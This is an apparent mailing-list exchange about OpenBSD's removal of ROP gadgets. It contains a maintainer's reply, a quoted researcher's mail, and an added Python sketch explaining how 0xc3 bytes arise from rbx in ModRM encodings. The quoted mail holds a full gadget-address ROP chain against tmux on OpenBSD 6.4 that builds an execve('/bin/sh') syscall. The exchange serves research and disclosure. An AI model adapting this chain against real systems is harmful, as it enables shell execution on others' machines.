There is no comprehensive & final solution for RET polymorphism due to variable-sized instruction architecture, and the only solution is to move to fixed-sized architectures where all RETs can be protected and ROP-free therefore becomes possible.
The best we can do is reduce it. The ability to reach execve() is being constrained more and more using privsep, pledge where possible, unveil if we can, forcing people to use the execve stub in libc (which is at a per-boot random location), and further efforts (coming soon) which will hurt calling generic syscall or the use of syscall instructions inside other syscall stubs. Each thing increases the effort to reach exploitation.

I do not understand the sample you gave, it is impossible to visualize the approach being taken -- you have not shown how you are finding the syscall instruction. Also note that it must be *THE SYSCALL* instruction for execve, in per-boot-randomly-linked aslr-placed libc.so. So you have determined this online?

Finally, I believe the phrase "exploit" truly requires a privilege escalation or gain of other capability. What did you gain? I believe you gain nothing from this demonstrator.

Nan ZoE <[email protected]> wrote:
> Hello,
>
> I have read your paper regarding the ROP mitigation mechanism (Removing ROP
> Gadgets from OpenBSD), and I find the defense against ROP quite ingenious.
> The paper introduces the bytecode for 'ret' as '\xc3,' and its association
> with the use of the 'rbx' register was a surprising revelation.
> Subsequently, you adjusted the prioritization of the 'rbx' register during
> compilation, effectively filtering out a significant number of 'ret'-ending
> gadgets. This especially removed many misaligned 'ret'-ending gadgets, and
> this technique has been applied to openbsd-63, 64, and 65. While the number
> of 'ret'-ending gadgets has been significantly reduced, there are still
> numerous 'call'-ending gadgets in the program. Security researchers can
> still employ many 'call'-ending gadgets to carry out ROP attacks. Even in
> programs of only a few hundred kilobytes, I have found that we can still
> invoke the execve("/bin/sh", 0, 0) function using only the available
> gadgets in the program, albeit it may require a combination of multiple
> gadgets and some effort to achieve. I am curious if there are any further
> ROP mitigation measures to address this issue? Additionally, I have
> provided a ROP attack example targeting the tmux program in OpenBSD-64, as
> shown below.
>
> payload = p64(0x4017ce)
> #0x00000000004017ce: pop r13; pop r14; pop r15; ret;
> payload += p64(0x68732f6e69622f)+p64(0x0)+p64(0x0)+p64(0x40125d)
> # 0x000000000040125d: pop rbp; ret;
> payload += p64(0x4017d1)+p64(0x403dd3)
> # 0x0000000000403dd3: xchg eax, ebp; ret;
> payload += p64(0x412208)
> # 0x0000000000412208: mov rcx, r13; call rax;
> payload += b''
> # 0x00000000004017d1: pop rsi; pop r15; ret;
> payload += p64(0x0)+p64(0x40125d)
> # 0x000000000040125d: pop rbp; ret;
> payload += p64(0x40125d)+p64(0x403dd3)
> # 0x0000000000403dd3: xchg eax, ebp; ret;
> payload += p64(0x427a31)
> # 0x0000000000427a31: pop rbx; pop rbp; jmp rax;
> payload += p64(0x49e0ed)+p64(0x0)
> # 0x000000000040125d: pop rbp; ret;
> payload += p64(0x4017d1)+p64(0x403dd3)
> # 0x0000000000403dd3: xchg eax, ebp; ret;
> payload += p64(0x412053)
> # 0x0000000000412053: mov r8, rbx; call rax;
> payload += b''
> # 0x00000000004017d1: pop rsi; pop r15; ret;
> payload += p64(0x0)+p64(0x4551d9)
> # 0x00000000004551d9: add qword ptr [r8 - 0x7d], rcx; ret;
> payload += p64(0x4017d3)
> # 0x00000000004017d3: pop rdi; ret;
> payload += p64(0x49e070)+p64(0x40d571)
> # 0x000000000040d571: pop rsi; ret;
> payload += p64(0x0)+p64(0x4017cf)
> # 0x00000000004017cf: pop rbp; pop r14; pop r15; ret;
> payload += p64(0x0)+p64(0x4017d0)+p64(0x0)+p64(0x40125d)
> # 0x000000000040125d: pop rbp; ret;
> payload += p64(0x49e1d0)+p64(0x42d80b)
> # 0x000000000042d80b: mov rdx, r15; mov rcx, qword ptr [rbp - 0x40]; mov rax, r14; call rax;
> payload += b''
> # 0x00000000004017d0: pop r14; pop r15; ret;
> payload += p64(0x0)+p64(0x40125d)
> # 0x000000000040125d: pop rbp; ret;
> payload += p64(0x3b)+p64(0x403dd3)
> # 0x0000000000403dd3: xchg eax, ebp; ret;
> payload += p64(0x407fae)
> # 0x0000000000407fae: syscall;
> payload += b''
>
> Best regards,
> ZoE
> 2023.09.21
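As an added illustration that belongs to neither mail above, the following Python sketch shows the encoding fact behind the quoted '\xc3'/rbx observation: a register-direct ModRM byte becomes 0xc3 exactly when the reg field is rax (or r8) and the rm field is rbx (or r11), so steering the register allocator away from rbx removes those embedded, misaligned returns while a real `ret` stays countable. It models only the ModRM mod=11 case (0xc3 inside immediates or displacements is out of scope), and the two-instruction "save rax, return" body it compares is a constructed sample.

```python
# Added example (not code from the thread or from OpenBSD): why the x86-64 RET
# opcode 0xc3 gets embedded inside other instructions, and why avoiding rbx in
# register allocation removes many "misaligned" returns. Assumption: only the
# register-direct (ModRM mod=11) encodings are modelled here.

RET = 0xC3

# Register numbers: low 3 bits go into ModRM reg/rm, bit 3 into REX.R / REX.B.
REGS = {"rax": 0, "rcx": 1, "rdx": 2, "rbx": 3, "rsp": 4, "rbp": 5, "rsi": 6, "rdi": 7,
        "r8": 8, "r9": 9, "r10": 10, "r11": 11, "r12": 12, "r13": 13, "r14": 14, "r15": 15}

def modrm(mod, reg, rm):
    """Assemble a ModRM byte from its 2-bit mod, 3-bit reg and 3-bit rm fields."""
    return ((mod & 3) << 6) | ((reg & 7) << 3) | (rm & 7)

def ret_producing_pairs():
    """Every (reg-field register, rm-field register) pair whose register-direct
    ModRM byte is 0xc3, i.e. every two-operand instruction hiding a RET byte."""
    return {(r, m) for r in REGS for m in REGS if modrm(3, REGS[r], REGS[m]) == RET}

def encode_mov_r64(dst, src):
    """REX.W 89 /r: MOV r/m64, r64 with dst in the rm field and src in reg."""
    rex = 0x48 | (0x04 if REGS[src] >= 8 else 0) | (0x01 if REGS[dst] >= 8 else 0)
    return bytes([rex, 0x89, modrm(3, REGS[src], REGS[dst])])

def scan_rets(insns):
    """Split the 0xc3 bytes of a list of instruction encodings into real RETs and
    RETs embedded inside other instructions. A gadget scanner working backwards
    from every 0xc3 byte in the text segment cannot tell the two kinds apart."""
    real = sum(1 for i in insns if i == b"\xc3")
    embedded = sum(i.count(RET) for i in insns if i != b"\xc3")
    return real, embedded

def compare_allocation():
    """Constructed body 'save rax in a callee-saved register; ret', once with rbx
    and once with r12 (another callee-saved register the allocator could pick)."""
    with_rbx = [encode_mov_r64("rbx", "rax"), b"\xc3"]   # 48 89 c3  c3
    with_r12 = [encode_mov_r64("r12", "rax"), b"\xc3"]   # 49 89 c4  c3
    return scan_rets(with_rbx), scan_rets(with_r12)

if __name__ == "__main__":
    print(sorted(ret_producing_pairs()))   # [('r8', 'r11'), ('r8', 'rbx'), ('rax', 'r11'), ('rax', 'rbx')]
    print(compare_allocation())             # ((1, 1), (1, 0))
```

The second tuple in `compare_allocation()` is the point of the compiler change: the real `ret` is still there, but the instruction that moved a value into rbx no longer carries a second, misaligned 0xc3.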

